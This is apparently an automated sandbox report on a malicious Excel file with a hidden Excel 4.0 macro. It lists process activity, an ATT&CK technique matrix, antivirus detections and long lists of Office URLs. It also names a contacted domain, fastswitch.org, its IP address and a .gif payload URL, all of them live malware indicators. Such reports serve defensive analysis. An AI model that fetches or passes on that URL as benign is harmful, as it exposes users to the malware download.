    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000001.00000002.242514494.0000000004A50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.242514494.0000000004A50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.242514494.0000000004A50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.242514494.0000000004A50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1429954472.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1429954472.xls48%ReversingLabsDocument-Word.Trojan.Abracadabra

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    http://fastswitch.org/ds/0702.gif0%Avira URL Cloudsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fastswitch.org
    47.244.191.15
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://fastswitch.org/ds/0702.giffalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
        high
        https://login.microsoftonline.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
          high
          https://shell.suite.office.com:1443A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
              high
              https://autodiscover-s.outlook.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                  high
                  https://cdn.entity.A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                        high
                        https://powerlift.acompli.netA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                          high
                          https://cortana.aiA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                    high
                                    https://api.aadrm.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                          high
                                          https://cr.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControlA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/OfficeA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                high
                                                https://graph.ppe.windows.netA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.netA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplateA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplateA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetectA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                high
                                                                https://graph.windows.netA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/apiA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                    high
                                                                    https://prod-global-autodetect.acompli.net/autodetectA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspxA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                        high
                                                                                        https://management.azure.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.aiA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.comA22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/A22CCA86-2F39-4600-BB5A-EA92F07BD5C2.0.drfalse
